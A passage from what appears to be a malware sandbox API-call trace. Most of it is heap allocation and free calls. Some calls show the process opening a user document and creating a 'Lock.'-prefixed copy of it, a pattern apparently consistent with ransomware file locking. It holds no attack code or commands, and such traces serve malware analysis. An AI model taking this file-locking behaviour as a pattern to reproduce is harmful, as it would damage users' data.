hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0267.976] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/VQCf4sXQz0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\vqcf4sxqz0.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.027] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.027] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0268.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0268.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.028] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0268.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0268.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.029] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.VQCf4sXQz0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.vqcf4sxqz0.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0268.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0268.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0268.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0268.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125a020 [0268.034] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0268.034] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x731b, lpOverlapped=0x0) returned 1 [0268.036] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0268.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x731b) returned 0x2f16018 [0268.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125a020 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x731b) returned 0x2f1d340 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x731b) returned 0x2f16018 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.041] PeekMessageW (in: lpMsg=0x8cf708, 